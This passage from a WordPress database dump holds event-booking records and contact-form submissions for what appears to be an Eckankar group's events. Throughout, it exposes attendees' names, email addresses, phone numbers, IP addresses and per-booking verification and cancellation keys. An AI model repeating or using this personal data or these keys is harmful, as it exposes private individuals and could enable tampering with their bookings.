Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.153.57.183\";}}'),(166318,266859,'mec_price','0'),(166319,266859,'mec_gateway','MEC_gateway_free'),(166320,266859,'mec_gateway_label','Free'),(166321,266860,'mec_transaction_id','CZA82590'),(166322,266860,'mec_user_id','1000012'),(166323,266860,'mec_verified','1'),(166324,266860,'mec_verification_key','7b8e881c2c9117bc26a77cb619379056'),(166325,266860,'mec_cancellation_key','1403a022d8c148d3a617dad9f65d81f0'),(166326,266860,'mec_confirmed','1'),(166327,266860,'mec_event_id','266820'),(166328,266860,'mec_date','1657449000:1657495800'),(166329,266860,'mec_ticket_id',',1,'),(166330,266860,'mec_booking_time','2022-07-10 10:07:35'),(166331,266860,'mec_all_dates','a:0:{}'),(166332,266860,'mec_other_dates','a:0:{}'),(166333,266860,'mec_attention_time','1657449000:1657495800'),(166334,266860,'mec_attention_time_start','1657449000'),(166335,266860,'mec_attention_time_end','1657495800'),(166336,266860,'mec_book_date_submit','20220710100735'),(166337,266860,'mec_booking_location','129'),(166338,266860,'mec_ticket_price_1','0'),(166339,266860,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"65.130.82.143\";}}'),(166340,266860,'mec_price','0'),(166341,266860,'mec_gateway','MEC_gateway_free'),(166342,266860,'mec_gateway_label','Free'),(166343,266861,'mec_transaction_id','GOV55106'),(166344,266861,'mec_user_id','1000034'),(166345,266861,'mec_verified','1'),(166346,266861,'mec_verification_key','2a42c43126fd70cdaa2f14e558c77331'),(166347,266861,'mec_cancellation_key','805349030f3ce37fd30444e163803288'),(166348,266861,'mec_confirmed','1'),(166349,266861,'mec_event_id','266820'),(166350,266861,'mec_date','1657449000:1657495800'),(166351,266861,'mec_ticket_id',',1,'),(166352,266861,'mec_booking_time','2022-07-10 10:20:16'),(166353,266861,'mec_all_dates','a:0:{}'),(166354,266861,'mec_other_dates','a:0:{}'),(166355,266861,'mec_attention_time','1657449000:1657495800'),(166356,266861,'mec_attention_time_start','1657449000'),(166357,266861,'mec_attention_time_end','1657495800'),(166358,266861,'mec_book_date_submit','20220710102016'),(166359,266861,'mec_booking_location','129'),(166360,266861,'mec_ticket_price_1','0'),(166361,266861,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"alaffertyhu@gmail.com\";s:4:\"name\";s:13:\"Anna Lafferty\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"174.51.221.42\";}}'),(166362,266861,'mec_price','0'),(166363,266861,'mec_gateway','MEC_gateway_free'),(166364,266861,'mec_gateway_label','Free'),(166365,266862,'_field_133','David'),(166366,266862,'_field_134','Coldwell'),(166367,266862,'_field_135','class1coldwell@gmail.com'),(166368,266862,'_field_137','No zoom link'),(166369,266862,'_field_138','I am not receiving any zoom link after registering 3 times'),(166370,266862,'_form_id','13'),(166371,266862,'_seq_num','112'),(166372,266863,'mec_transaction_id','HDF28140'),(166373,266863,'mec_user_id','1000035'),(166374,266863,'mec_verified','1'),(166375,266863,'mec_verification_key','ff095d4285f76f744cd32d4fbd72d5fa'),(166376,266863,'mec_cancellation_key','5986bf19a64449c80b0cd221515e2d34'),(166377,266863,'mec_confirmed','1'),(166378,266863,'mec_event_id','266820'),(166379,266863,'mec_date','1657449000:1657495800'),(166380,266863,'mec_ticket_id',',1,'),(166381,266863,'mec_booking_time','2022-07-10 10:20:55'),(166382,266863,'mec_all_dates','a:0:{}'),(166383,266863,'mec_other_dates','a:0:{}'),(166384,266863,'mec_attention_time','1657449000:1657495800'),(166385,266863,'mec_attention_time_start','1657449000'),(166386,266863,'mec_attention_time_end','1657495800'),(166387,266863,'mec_book_date_submit','20220710102055'),(166388,266863,'mec_booking_location','129'),(166389,266863,'mec_ticket_price_1','0'),(166390,266863,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"stuart@olypen.com\";s:4:\"name\";s:12:\"Linda Walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"73.140.188.185\";}}'),(166391,266863,'mec_price','0'),(166392,266863,'mec_gateway','MEC_gateway_free'),(166393,266863,'mec_gateway_label','Free'),(166394,266864,'mec_transaction_id','DGX64933'),(166395,266864,'mec_user_id','1000036'),(166396,266864,'mec_verified','1'),(166397,266864,'mec_verification_key','ab2d9fcdfa56d005049eef5892c209e2'),(166398,266864,'mec_cancellation_key','e55bd0269598082891b64b856ed4c03f'),(166399,266864,'mec_confirmed','1'),(166400,266864,'mec_event_id','266820'),(166401,266864,'mec_date','1657449000:1657495800'),(166402,266864,'mec_ticket_id',',1,'),(166403,266864,'mec_booking_time','2022-07-10 10:23:27'),(166404,266864,'mec_all_dates','a:0:{}'),(166405,266864,'mec_other_dates','a:0:{}'),(166406,266864,'mec_attention_time','1657449000:1657495800'),(166407,266864,'mec_attention_time_start','1657449000'),(166408,266864,'mec_attention_time_end','1657495800'),(166409,266864,'mec_book_date_submit','20220710102327'),(166410,266864,'mec_booking_location','129'),(166411,266864,'mec_ticket_price_1','0'),(166412,266864,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"47.12.99.86\";}}'),(166413,266864,'mec_price','0'),(166414,266864,'mec_gateway','MEC_gateway_free'),(166415,266864,'mec_gateway_label','Free'),(166416,266865,'mec_transaction_id','PTA53516'),(166417,266865,'mec_user_id','1000037'),(166418,266865,'mec_verified','1'),(166419,266865,'mec_verification_key','e12b378e0206942cd7d294df8f6b290a'),(166420,266865,'mec_cancellation_key','a708535496946ed775952cdebd4b4c1c'),(166421,266865,'mec_confirmed','1'),(166422,266865,'mec_event_id','266820'),(166423,266865,'mec_date','1657449000:1657495800'),(166424,266865,'mec_ticket_id',',1,'),(166425,266865,'mec_booking_time','2022-07-10 10:31:14'),(166426,266865,'mec_all_dates','a:0:{}'),(166427,266865,'mec_other_dates','a:0:{}'),(166428,266865,'mec_attention_time','1657449000:1657495800'),(166429,266865,'mec_attention_time_start','1657449000'),(166430,266865,'mec_attention_time_end','1657495800'),(166431,266865,'mec_book_date_submit','20220710103114'),(166432,266865,'mec_booking_location','129'),(166433,266865,'mec_ticket_price_1','0'),(166434,266865,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"p_b_reeves@msn.com\";s:4:\"name\";s:14:\"Patrick Reeves\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"71.34.140.92\";}}'),(166435,266865,'mec_price','0'),(166436,266865,'mec_gateway','MEC_gateway_free'),(166437,266865,'mec_gateway_label','Free'),(166438,266866,'mec_transaction_id','QHT74612'),(166439,266866,'mec_user_id','1000038'),(166440,266866,'mec_verified','1'),(166441,266866,'mec_verification_key','c1a11d141ed43b6bef274e10b7ec917c'),(166442,266866,'mec_cancellation_key','1f3afb3060dcdd5f7fa65af598683078'),(166443,266866,'mec_confirmed','1'),(166444,266866,'mec_event_id','266820'),(166445,266866,'mec_date','1657449000:1657495800'),(166446,266866,'mec_ticket_id',',1,'),(166447,266866,'mec_booking_time','2022-07-10 10:33:22'),(166448,266866,'mec_all_dates','a:0:{}'),(166449,266866,'mec_other_dates','a:0:{}'),(166450,266866,'mec_attention_time','1657449000:1657495800'),(166451,266866,'mec_attention_time_start','1657449000'),(166452,266866,'mec_attention_time_end','1657495800'),(166453,266866,'mec_book_date_submit','20220710103322'),(166454,266866,'mec_booking_location','129'),(166455,266866,'mec_ticket_price_1','0'),(166456,266866,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"renee4eck@hotmail.com\";s:4:\"name\";s:12:\"Renee Wholey\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"164.92.93.15\";}}'),(166457,266866,'mec_price','0'),(166458,266866,'mec_gateway','MEC_gateway_free'),(166459,266866,'mec_gateway_label','Free'),(166460,266867,'mec_transaction_id','KND86843'),(166461,266867,'mec_user_id','1000001'),(166462,266867,'mec_verified','1'),(166463,266867,'mec_verification_key','dc01d2ca1eea80b45ff946d42f08d341'),(166464,266867,'mec_cancellation_key','c7a0cabecd7e17ced567759a61a8f94c'),(166465,266867,'mec_confirmed','1'),(166466,266867,'mec_event_id','266820'),(166467,266867,'mec_date','1657449000:1657495800'),(166468,266867,'mec_ticket_id',',1,'),(166469,266867,'mec_booking_time','2022-07-10 10:43:28'),(166470,266867,'mec_all_dates','a:0:{}'),(166471,266867,'mec_other_dates','a:0:{}'),(166472,266867,'mec_attention_time','1657449000:1657495800'),(166473,266867,'mec_attention_time_start','1657449000'),(166474,266867,'mec_attention_time_end','1657495800'),(166475,266867,'mec_book_date_submit','20220710104328'),(166476,266867,'mec_booking_location','129'),(166477,266867,'mec_ticket_price_1','0'),(166478,266867,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"kellywinfo@gmail.com\";s:4:\"name\";s:13:\"Kelly Walker \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"97.122.252.60\";}}'),(166479,266867,'mec_price','0'),(166480,266867,'mec_gateway','MEC_gateway_free'),(166481,266867,'mec_gateway_label','Free'),(166482,266868,'_field_133','obome'),(166483,266868,'_field_134','oko'),(166484,266868,'_field_135','obomewilfredo@gmil.com'),(166485,266868,'_field_137','NEED HELP'),(166486,266868,'_field_138','GOOD DAY BFELLOW ECKIST, I NEED HELP FROM MY FELLOW ECKIST, I AM AN ECKIST FROM NIGERIA, MEANS OF SURVIVAL ARE VERY DIFFICULT HERE IN NIGERIA, SOME EVEN REJECT YOUR JOB APPLICATION IF THE KNOW THAT YOU ARE AN ECKIST, BECAUSE MOST OF THEM SEE ECKIST AS AN OCCULTIST MEMBERS AND WITH THEIR NEGATIVE NOTION ABOUT ECKANKAR. BARAKA BASHAD MAY THE BLESSINGS BE. THANK YOU, LOVE YOU ALL.'),(166487,266868,'_form_id','13'),(166488,266868,'_seq_num','113'),(166489,266869,'_field_450','Meghan'),(166490,266869,'_field_451','Bright'),(166491,266869,'_field_458','9708894252'),(166492,266869,'_field_452','inkthinker2@gmail.com'),(166493,266869,'_field_453','New Member Meeting'),(166494,266869,'_field_454','Hello,\n\nJust interested in meeting you all to see if I might join!?\n\nThanks,\nMeghan'),(166495,266869,'_form_id','49'),(166496,266869,'_seq_num','6'),(166497,266871,'protect_children',''),(166498,266871,'mec_color',''),(166499,266871,'mec_location_id','147'),(166500,266871,'mec_dont_show_map','0'),(166501,266871,'mec_organizer_id','1'),(166502,266871,'mec_read_more',''),(166503,266871,'mec_more_info',''),(166504,266871,'mec_more_info_title',''),(166505,266871,'mec_more_info_target','_self'),(166506,266871,'mec_cost',''),(166507,266871,'mec_currency','a:0:{}'),(166508,266871,'mec_additional_organizer_ids','a:0:{}'),(166509,266871,'mec_additional_location_ids','a:0:{}'),(166510,266871,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-21\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-21\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/23/2022\";s:18:\"end_at_occurrences\";s:1:\"3\";}}'),(166511,266871,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/23/2022\";s:18:\"end_at_occurrences\";s:1:\"3\";}'),(166512,266871,'mec_certain_weekdays','a:0:{}'),(166513,266871,'mec_allday','0'),(166514,266871,'one_occurrence','0'),(166515,266871,'mec_hide_time','0'),(166516,266871,'mec_hide_end_time','0'),(166517,266871,'mec_comment',''),(166518,266871,'mec_timezone','global'),(166519,266871,'mec_countdown_method','global'),(166520,266871,'mec_public','1'),(166521,266871,'mec_start_date','2022-08-21'),(166522,266871,'mec_start_time_hour','10'),(166523,266871,'mec_start_time_minutes','30'),(166524,266871,'mec_start_time_ampm','AM'),(166525,266871,'mec_start_day_seconds','37800'),(166526,266871,'mec_end_date','2022-08-21'),(166527,266871,'mec_end_time_hour','11'),(166528,266871,'mec_end_time_minutes','30'),(166529,266871,'mec_end_time_ampm','AM'),(166530,266871,'mec_end_day_seconds','41400'),(166531,266871,'mec_repeat_status','1'),(166532,266871,'mec_repeat_type','advanced'),(166533,266871,'mec_repeat_interval','1'),(166534,266871,'mec_repeat_end','date'),(166535,266871,'mec_repeat_end_at_occurrences','2'),(166536,266871,'mec_repeat_end_at_date','2022-10-23'),(166537,266871,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.3\";}'),(166538,266871,'mec_in_days',''),(166539,266871,'mec_not_in_days',''),(166540,266871,'mec_hourly_schedules','a:0:{}'),(166541,266871,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(166542,266871,'mec_tickets','a:0:{}'),(166543,266871,'mec_fees_global_inheritance','1'),(166544,266871,'mec_fees','a:0:{}'),(166545,266871,'mec_ticket_variations_global_inheritance','1'),(166546,266871,'mec_ticket_variations','a:0:{}'),(166547,266871,'mec_reg_fields_global_inheritance','1'),(166548,266871,'mec_reg_fields','a:0:{}'),(166549,266871,'mec_bfixed_fields','a:0:{}'),(166550,266871,'mec_op','a:0:{}'),(166551,266871,'mec_fields','a:0:{}'),(166552,266871,'mec_event_status','EventScheduled'),(166553,266871,'mec_moved_online_link',''),(166554,266871,'mec_cancelled_reason',''),(166555,266871,'mec_display_cancellation_reason_in_single_page',''),(166556,266871,'boldgrid_hide_page_title','0'),(166557,266871,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(166558,266871,'passster_activate_global_protection',NULL),(166559,266871,'passster_activate_protection',NULL),(166560,266871,'passster_protection_type','password'),(166561,266871,'sg_popup_target_custom','a:1:{i:0;s:6:\"264857\";}'),(166562,266871,'sgpb_popup_events_custom','a:1:{i:264857;a:1:{i:0;s:5:\"click\";}}'),(166566,266871,'_dp_original','266168'),(166564,266871,'_wp_old_date','2022-01-18'),(166565,266871,'boldgrid_in_page_containers','1'),(166567,266871,'_edit_lock','1658085414:2'),(166568,266871,'_edit_last','2'),(166569,266063,'_edit_lock','1690994920:2'),(166570,266063,'_edit_last','2'),(166571,266871,'_thumbnail_id','266874'),(167910,267041,'mec_additional_organizer_ids','a:0:{}'),(167905,267041,'mec_more_info',''),(168192,267076,'_field_454','What is the address for today’s Light and Sound event?'),(168191,267076,'_field_453','Location '),(168188,267076,'_field_451','Gage'),(168189,267076,'_field_458','2152668426'),(168190,267076,'_field_452','lisa1lg3@gmail.com'),(168198,267087,'mec_user_id','1000036'),(168199,267087,'mec_verified','1'),(168200,267087,'mec_verification_key','016b7af30fb5c6367f39629bd292edef'),(169415,267201,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:34:\"2022/09/unsplash-wave-surfer-1.jpg\";s:8:\"filesize\";i:456858;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"unsplash-wave-surfer-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11131;}s:5:\"large\";a:5:{s:4:\"file\";s:35:\"unsplash-wave-surfer-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107731;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"unsplash-wave-surfer-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5100;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"unsplash-wave-surfer-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60602;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:34:\"unsplash-wave-surfer-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16298;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:34:\"unsplash-wave-surfer-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28370;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:34:\"unsplash-wave-surfer-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19550;}s:8:\"tileview\";a:5:{s:4:\"file\";s:34:\"unsplash-wave-surfer-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20667;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"unsplash-wave-surfer-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:236729;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166574,266874,'_wp_attached_file','2022/07/eagle-blusky-3-1.jpg'),(166575,266874,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:715;s:6:\"height\";i:403;s:4:\"file\";s:28:\"2022/07/eagle-blusky-3-1.jpg\";s:8:\"filesize\";i:70566;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"eagle-blusky-3-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14321;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"eagle-blusky-3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6940;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"eagle-blusky-3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20355;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"eagle-blusky-3-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33399;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"eagle-blusky-3-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24213;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"eagle-blusky-3-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24537;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166758,266888,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"2\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:1:\"2\";}'),(166759,266888,'mec_certain_weekdays','a:0:{}'),(166760,266888,'mec_allday','0'),(166761,266888,'one_occurrence','0'),(166762,266888,'mec_hide_time','0'),(166763,266888,'mec_hide_end_time','0'),(166764,266888,'mec_comment',''),(166765,266888,'mec_timezone','global'),(166766,266888,'mec_countdown_method','global'),(166767,266888,'mec_public','1'),(166768,266888,'mec_start_date','2022-09-10'),(166769,266888,'mec_start_time_hour','10'),(166770,266888,'mec_start_time_minutes','0'),(166771,266888,'mec_start_time_ampm','AM'),(166772,266888,'mec_start_day_seconds','36000'),(166773,266888,'mec_end_date','2022-09-11'),(166774,266888,'mec_end_time_hour','5'),(166775,266888,'mec_end_time_minutes','0'),(166776,266888,'mec_end_time_ampm','PM'),(166777,266888,'mec_end_day_seconds','61200'),(166778,266888,'mec_repeat_status','1'),(166779,266888,'mec_repeat_type','custom_days'),(166780,266888,'mec_repeat_interval','2'),(166781,266888,'mec_repeat_end','never'),(166782,266888,'mec_repeat_end_at_occurrences','1'),(166783,266888,'mec_repeat_end_at_date',''),(166784,266888,'mec_advanced_days','a:0:{}'),(166785,266888,'mec_in_days',''),(166786,266888,'mec_not_in_days',''),(166787,266888,'mec_hourly_schedules','a:0:{}'),(166788,266888,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(166789,266888,'mec_tickets','a:0:{}'),(166790,266888,'mec_fees_global_inheritance','1'),(166791,266888,'mec_fees','a:0:{}'),(166792,266888,'mec_ticket_variations_global_inheritance','1'),(166793,266888,'mec_ticket_variations','a:0:{}'),(166794,266888,'mec_reg_fields_global_inheritance','1'),(166795,266888,'mec_reg_fields','a:0:{}'),(166796,266888,'mec_bfixed_fields','a:0:{}'),(166797,266888,'mec_op','a:0:{}'),(166798,266888,'mec_fields','a:0:{}'),(166799,266888,'mec_event_status','EventScheduled'),(166800,266888,'mec_moved_online_link',''),(166801,266888,'mec_cancelled_reason',''),(166802,266888,'mec_display_cancellation_reason_in_single_page',''),(166803,266888,'boldgrid_hide_page_title','0'),(166804,266888,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(166805,266888,'passster_activate_global_protection',NULL),(166806,266888,'passster_activate_protection',NULL),(166807,266888,'passster_protection_type','password'),(166808,266888,'boldgrid_in_page_containers','1'),(166809,266888,'_dp_original','265240'),(166810,266888,'_edit_lock','1693081025:2'),(166811,266888,'_edit_last','2'),(166812,266889,'_wp_attached_file','2022/07/2022-ECK-durango-whole-expo-1.jpg'),(166813,266889,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:770;s:6:\"height\";i:434;s:4:\"file\";s:41:\"2022/07/2022-ECK-durango-whole-expo-1.jpg\";s:8:\"filesize\";i:129451;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"2022-ECK-durango-whole-expo-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21121;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"2022-ECK-durango-whole-expo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10433;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"2022-ECK-durango-whole-expo-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104329;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:41:\"2022-ECK-durango-whole-expo-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32843;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:41:\"2022-ECK-durango-whole-expo-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53043;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:41:\"2022-ECK-durango-whole-expo-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37324;}s:8:\"tileview\";a:5:{s:4:\"file\";s:41:\"2022-ECK-durango-whole-expo-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39129;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"